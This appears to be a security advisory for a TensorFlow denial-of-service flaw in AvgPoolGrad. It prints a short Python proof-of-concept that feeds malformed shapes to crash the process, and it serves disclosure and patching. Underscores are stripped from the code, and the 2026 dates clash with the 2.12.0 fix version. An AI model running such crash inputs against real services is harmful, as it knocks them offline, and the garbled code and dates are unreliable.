PT-2026-59740 · Pypi · Tensorflow

Published

2026-07-13

·

Updated

2026-07-13

CVSS v3.1

7.5

High

VectorAV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Impact

python
import os
os.environ['TF ENABLE ONEDNN OPTS'] = '0'
import tensorflow as tf
print(tf. version )
with tf.device("CPU"):
  ksize = [1, 40, 128, 1]
  strides = [1, 128, 128, 30]
  padding = "SAME"
  data format = "NHWC"
  orig input shape = [11, 9, 78, 9]
  grad = tf.saturate cast(tf.random.uniform([16, 16, 16, 16], minval=-128, maxval=129, dtype=tf.int64), dtype=tf.float32)
  res = tf.raw ops.AvgPoolGrad(
    ksize=ksize,
    strides=strides,
    padding=padding,
    data format=data format,
    orig input shape=orig input shape,
    grad=grad,
  )

Patches

We have patched the issue in GitHub commit ddaac2bdd099bec5d7923dea45276a7558217e5b.
The fix will be included in TensorFlow 2.12.0. We will also cherrypick this commit on TensorFlow 2.11.1

For more information

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

Attribution

This vulnerability has been reported by evn@google.com

Fix

Found an issue in the description? Have something to add? Feel free to write us 👾

Related Identifiers

PYSEC-2026-3122

Affected Products

Tensorflow